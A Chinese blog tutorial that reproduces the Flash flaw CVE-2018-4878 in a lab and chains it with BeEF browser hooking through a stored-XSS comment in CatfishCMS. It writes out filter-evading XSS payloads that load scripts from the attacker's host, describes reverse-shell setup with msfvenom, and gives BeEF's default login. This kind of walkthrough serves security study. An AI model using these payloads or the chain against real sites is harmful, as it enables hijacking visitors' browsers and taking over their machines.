【漏洞复现】BeEF与CVE-2018-4878漏洞利用

2019-12-26 13:59:09 浏览数 (1)

Hello,各位小伙伴大家好~

这里是你们消失已久的小编...

拖更一时爽,一直拖更一直爽...

今天来看看CVE-2018-4878结合BeEF的利用吧~

Part.1

CVE-2018-4878

漏洞利用

CVE-2018-4878:

攻击者可以构造特殊的Flash链接,一旦用户用浏览器等方式访问此Flash链接,就会被“远程代码执行”,直接被getshell。

针对此漏洞,网上已经有成熟的利用代码了,公众号直接回复CVE-2018-4878即可下载。来看看怎么利用吧~

首先使用msfvenom生成一段python类型的shell代码:

查看生成的代码如下:

然后我们打开下载的CVE-2018-4878利用脚本,将以下部分替换为上面的代码即可:

查看该利用脚本,可以看到脚本执行后会在root目录下生成两个文件:

通过python执行脚本:

接着开启apache2服务,并将生成的两个文件剪切到apache根目录下:

在kali上开启监听,接收反弹shell:

攻击端配置完毕~~

在靶机需要安装版本<= 28.0.0.137的flash,公众号直接回复CVE-2018-4878即可下载:

安装完毕后,使用浏览器访问kali攻击页面:

可以看到kali顺利getshell:

查看靶机系统信息:

如果此时靶机关闭浏览器,session则会断开:

注:如果浏览器版本过高,访问攻击页面时,浏览器不会执行flash插件:

//此处为firefox 71.0,需要手动点击执行flash才行。

Part.2

BeEF

BeEF的利用

在前面我们讲过使用存储型XSS进行网页挂马:

【XSS漏洞】通过XSS实现网页挂马

这里我们也来试试这种操作。

公众号回复CVE-2018-4878,下载安装存在存储型XSS的Catfishcms(DVWA也可以)

该CMS评论区存在存储型XSS:

留言后使用burp抓包,插入以下js脚本:

</tExtArEa>'"><sCRiPt sRC=http://192.168.31.54/index2.html></sCrIpT>

访问评论区,可以看到留言成功:

查看网页源代码,成功插入XSS:

但是kali并没有getshell:

是因为这种方法并不会执行flash脚本。

这里我们试试一款kali自带的工具beef-xss:

运行beef:

访问http://192.168.31.54:3000/ui/authentication即可登陆:

//登录名和密码默认都是:beef

我们将hook.js页面插入到存储型XSS处:

使用burp发包:</tExtArEa>'"><sCRiPt sRC=http://192.168.31.54:3000/hook.js></sCrIpT>

查看评论区留言:

可以看到BeEF上,靶机顺利上线:

在指令区使用重定向功能,将网页重定向到前面的攻击页面:

靶机的浏览器就会自动跳转到攻击页面,执行flash插件:

再查看kali,会发现成功getshell:

撒花完结~~

Part.3

结语

好啦,以上就是今天的全部内容了~

Peace!

0 人点赞